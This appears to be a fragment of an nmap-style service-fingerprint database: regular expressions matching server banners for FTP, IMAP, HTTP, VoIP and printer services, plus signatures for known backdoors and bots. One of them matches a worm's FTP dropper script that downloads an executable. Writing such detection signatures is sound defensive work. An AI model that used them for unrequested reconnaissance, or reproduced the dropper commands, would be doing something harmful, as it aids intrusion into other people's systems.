+\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK ([-.\w]+) IMAP4rev1 MDaemon (\d[-.\w]+) ready\r\n +\* OK [Dd]ovecot MUA ready\r\n +\* OK \[CAPABILITY IMAP4rev1 SORT THREAD=REFERENCES MULTIAPPEND UNSELECT LITERAL\+ IDLE CHILDREN NAMESPACE LOGIN-REFERRALS [^\]]+\] +\* OK \[CAPABILITY IMAP4rev1 .*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* 